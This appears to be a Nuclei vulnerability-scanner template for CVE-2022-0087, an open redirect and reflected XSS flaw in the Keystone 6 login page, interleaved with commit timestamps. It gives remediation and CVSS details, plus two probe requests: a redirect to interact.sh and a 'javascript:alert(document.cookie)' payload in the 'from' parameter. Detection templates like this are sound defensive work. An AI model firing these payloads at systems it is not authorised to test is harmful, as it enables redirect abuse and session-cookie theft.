2023-11-06 10:22:24 +00:00
id : CVE-2022-0087
info :
2023-12-21 08:26:43 +00:00
name : Keystone 6 Login Page - Open Redirect and Cross-Site Scripting
2023-11-06 16:17:02 +00:00
author : ShivanshKhari
2023-11-06 10:22:24 +00:00
severity : medium
2023-12-21 08:26:43 +00:00
description : |
On the login page, there is a "from=" parameter in URL which is vulnerable to open redirect and can be escalated to reflected XSS.
remediation : |
Please upgrade to @keystone-6/auth >= 1.0.2, where this vulnerability has been closed. If you are using @keystone-next/auth, we strongly recommend you upgrade to @keystone-6
2023-11-06 10:22:24 +00:00
reference :
- https://huntr.com/bounties/c9d7374f-2cb9-4bac-9c90-a965942f413e
2023-12-21 08:26:43 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-0087
2024-01-14 13:49:27 +00:00
- https://github.com/keystonejs/keystone/commit/96bf833a23b1a0a5d365cf394467a943cc481b38
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2022-0087
cwe-id : CWE-79
epss-score : 0.001
2024-05-31 19:23:20 +00:00
epss-percentile : 0.41295
2024-01-14 13:49:27 +00:00
cpe : cpe:2.3:a:keystonejs:keystone:*:*:*:*:*:node.js:*:*
2023-11-06 10:22:24 +00:00
metadata :
2023-12-21 08:26:43 +00:00
max-request : 2
2023-11-06 10:22:24 +00:00
vendor : keystonejs
product : keystone
framework : node.js
2024-01-14 09:21:50 +00:00
tags : cve,cve2022,keystone,redirect,xss,node.js,keystonejs
2023-11-06 10:22:24 +00:00
http :
- method : GET
path :
2023-11-28 06:30:07 +00:00
- "{{BaseURL}}/signin?from=https://interact.sh"
2023-11-06 10:22:24 +00:00
- "{{BaseURL}}/signin?from=javascript:alert(document.cookie)"
2023-11-28 06:34:37 +00:00
2023-11-28 06:31:08 +00:00
matchers-condition : and
2023-11-06 10:22:24 +00:00
matchers :
- type : word
part : header
words :
2023-11-28 06:30:07 +00:00
- "Location: https://interact.sh"
2023-11-06 10:22:24 +00:00
- type : word
part : body
words :
2023-12-08 08:11:40 +00:00
- "alert(document.cookie)"
2024-06-01 06:53:00 +00:00
# digest: 4b0a00483046022100c140ee61632dc67c9acc81a49ec451a15bb40801fed7f1b72d892508b42222ed022100e1b0b356f74b2f34f558cb407535b0fdecfbcdaaa934de641550cb0f2e1a290e:922c64590222798bb761d5b6d8e72950